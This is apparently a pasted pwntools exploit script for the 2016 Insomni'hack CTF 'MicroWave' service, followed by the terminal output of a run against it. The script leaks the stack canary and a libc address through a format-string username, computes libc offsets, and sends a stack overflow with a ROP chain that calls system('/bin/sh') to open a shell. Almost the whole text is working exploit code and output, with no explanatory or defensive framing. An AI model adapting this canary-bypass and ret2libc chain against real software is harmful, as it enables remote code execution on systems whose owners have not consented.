Untitled

#!/usr/bin/python

from pwn import *

proc = connect("127.0.0.1",6642)

user = "%p.%p.%p.%p.%p.%p.%p.%p.%p"
passw = "n07_7h3_fl46"

try:
    print proc.readuntil(":")

    proc.sendline("1")

    print proc.recvuntil("username:")

    proc.sendline(user)
    print proc.recvuntil("password:")
    proc.sendline(passw)

    #print proc.recv()

    data =  proc.recvuntil(":")[11::].split('.')

    print ' '.join(data)

    canary = data[5]
    libc_leak = data[1]
    code_addr = data[8]
    log.info("Code leak address %s",code_addr)
    log.info("Canary address %s",canary)
    log.info("Libc address %s",libc_leak)

    code_offset = 0x179a010
    libc_offset = 0xf66e0
    libc_base = int(libc_leak,16) - libc_offset

    log.info("Libc base address %s",hex(libc_base))

    proc.sendline("2")


    print proc.recvuntil("#>")

    #sleep(40)


    g1 = libc_base + 0x0000000000021102 # pop rdi ; ret

    payload = 1032 * "A"
    payload += p64(int(canary,16))
    payload += "B" * 8


    bin_sh = libc_base + 0x18c178
    system = libc_base + 0x45390

    log.info("/bin/sh address %s", hex(bin_sh))
    log.info("system address %s",hex(system))
    log.info("Gadget address %s",hex(g1))

    payload += p64(g1) #pop rdi ;ret
    payload += p64(bin_sh)
    payload += p64(system)
    payload += "B" * 8


    #sleep(40)

    proc.sendline(payload)

    proc.interactive()

except EOFError:
    pass

xothed@xoth:~/CTF/Insomni2016$ python micexp.py
[+] Opening connection to 127.0.0.1 on port 6642: Done

 --------------------------------------------------------
 |     Welcome to the next generation of MicroWaves!    |
 |                         ***                          |
 | This stylish Microwave with Grill function, includes |
 |      a function that tweets your favourite food!     |
 |                         ***                          |
 --------------------------------------------------------
           ----------------------------------
           |  1. Connect to Twitter account |
           |  2. Edit your tweet            |
           |  3. Grill & Tweet your food    |
           |  q. Exit                       |
           ----------------------------------

           [MicroWave]:

           Log in on Twitter:
           username:
            password:
0x7f06d832e780 0x7f06d805f6e0 0x7f06d852c700 0xa (nil) 0xa024f8f28952e700 0x7f06d832d708 0x7f06d832d710 0x55fec783f010
Twitter account

           ----------------------------------
           |  1  Connect to Twitter account |
           |  2  Edit your tweet            |
           |  3  Grill & Tweet your food    |
           |  q  Exit                       |
           ----------------------------------

           [MicroWave]:
[*] Code leak address 0x55fec783f010
    Twitter account
[*] Canary address 0xa024f8f28952e700
[*] Libc address 0x7f06d805f6e0
[*] Libc base address 0x7f06d7f69000

           #>
[*] /bin/sh address 0x7f06d80f5178
[*] system address 0x7f06d7fae390
[*] Gadget address 0x7f06d7f8a102
[*] Switching to interactive mode

           Done.
$  [*] Got EOF while reading in interactive

$ ls
[*] Closed connection to 127.0.0.1 port 6642
[*] Got EOF while sending in interactive